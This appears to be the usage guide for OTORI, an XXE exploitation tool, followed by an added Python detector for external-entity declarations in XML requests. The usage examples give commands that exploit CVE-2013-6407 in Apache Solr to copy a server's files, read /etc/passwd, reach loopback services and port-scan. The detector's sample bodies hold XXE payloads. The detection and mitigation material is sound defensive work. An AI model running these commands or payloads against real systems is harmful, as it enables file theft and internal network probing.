This tool is designed to exploit XML External Entity vulnerabilities by cloning as much of the target host's filesystem as possible to the system running OTORI. It depends entirely on custom modules for given vulnerabilities. See the documentation at http://www.beneaththewaves.net/Software/ for details.

Usage:

List available modules:

python ./otori.py --list


Get details about a particular module:

python ./otori.py --details "MODULENAME"
    

Clone target filesystem (in whole or in part):

python ./otori.py --clone --module "MODULENAME" --host "TARGET_HOST" --port "TARGET_PORT" --uristem "TARGET_URI_STEM" [--ssl] ([--singleuri "REQUESTED_URI"] OR [--rooturi "REQUESTED_ROOT_URI"] OR [--rooturilist "PATH_TO_LIST"] OR [--exacturilist "PATH_TO_LIST"]) --outputbase "BASE_OUTPUT_PATH" [--maxdepth N] [--retries N]


Perform a very basic port-scan and store any banners/default pages returned:


Act as an extremely basic HTTP proxy via the XXE channel (only GET requests supported):
[--storeallresults --outputbase "BASE_OUTPUT_PATH"] [--getforallmethods]


----------------------------------

Examples:


Get detailed information about the "CVE-2013-6407-DAH" module:

python ./otori.py --details "CVE-2013-6407-DAH"


Using the CVE-2013-6407 vulnerability (document analysis handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, download all possible files, with the recreated directory structure being based in the local directory /home/blincoln/cloned/solr-10.1.2.3/:

python ./otori.py --clone --module "CVE-2013-6407-DAH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/analysis/document" --rooturi "file:///" --outputbase "/home/blincoln/cloned/solr-10.1.2.3/"


Using the CVE-2013-6407 vulnerability (update request handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, download the /etc/passwd file to the local directory /home/blincoln/cloned/solr-10.1.2.3/:

python ./otori.py --clone --module "CVE-2013-6407-URH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/update" --rooturi "file:///etc/passwd" --outputbase "/home/blincoln/cloned/solr-10.1.2.3/"


Using the CVE-2013-6407 vulnerability (update request handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, attempt to access robots.txt using the loopback address of the target system, then store it in the local directory /home/blincoln/cloned/solr-10.1.2.3-loopback-80/:

python ./otori.py --clone --module "CVE-2013-6407-URH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/update" --singleuri "http://127.0.0.1/robots.txt" --outputbase "/home/blincoln/cloned/solr-10.1.2.3-loopback-80/"


Using the CVE-2013-6407 vulnerability (document analysis handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, perform a quasi-portscan, with the recreated directory structure being based in the local directory /home/blincoln/cloned/solr-10.1.2.3/:

python ./otori.py --clone --module "CVE-2013-6407-DAH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/analysis/document" --rooturilist "data/tcp_portscan-top_100.txt" --outputbase "/home/blincoln/cloned/solr-10.1.2.3-portscan/"
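
----------------------------------

Detection note (added example, not part of OTORI or its documentation): the examples above request file:// URIs and loopback http:// URIs through the XXE channel, so a server-side check can flag XML request bodies that declare external entities and label what each one would make the parser fetch. The function names, labels and sample bodies below are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# External entity declaration: <!ENTITY [%] name SYSTEM "uri"> or
# <!ENTITY [%] name PUBLIC "pubid" "uri">. Internal entities do not match.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(?P<name>[^\s>]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|\'[^\']*\'))\s+'
    r'(?P<q>["\'])(?P<uri>.*?)(?P=q)',
    re.DOTALL,
)

def classify_uri(uri):
    """Label a system identifier by what it would make the parser fetch."""
    parts = urlsplit(uri)
    if parts.scheme.lower() == "file":
        return "local-file"
    host = parts.hostname or ""
    if host == "localhost":
        return "internal-host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "remote-or-unknown"   # DNS name, empty host, other scheme
    internal = ip.is_loopback or ip.is_private or ip.is_link_local
    return "internal-host" if internal else "remote-or-unknown"

def find_external_entities(body):
    """Return (name, uri, label) for each external entity declared in body.
    body must already be decoded to str (for example from UTF-8 or UTF-16)."""
    return [(m["name"], m["uri"], classify_uri(m["uri"]))
            for m in ENTITY_RE.finditer(body)]

# Constructed sample request bodies (not captured traffic).
SAMPLES = {
    "file": '<?xml version="1.0"?><!DOCTYPE d ['
            '<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>',
    "loopback": '<?xml version="1.0"?><!DOCTYPE d ['
                '<!ENTITY xxe SYSTEM "http://127.0.0.1/robots.txt">]><d>&xxe;</d>',
    "benign": '<?xml version="1.0"?><!DOCTYPE d ['
              '<!ENTITY co "Example Co">]><d>&co;</d>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, find_external_entities(body))
```

A check like this is a backstop for logging and alerting; the fix for XXE is to disable DTD and external entity processing in the XML parser that handles the request.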
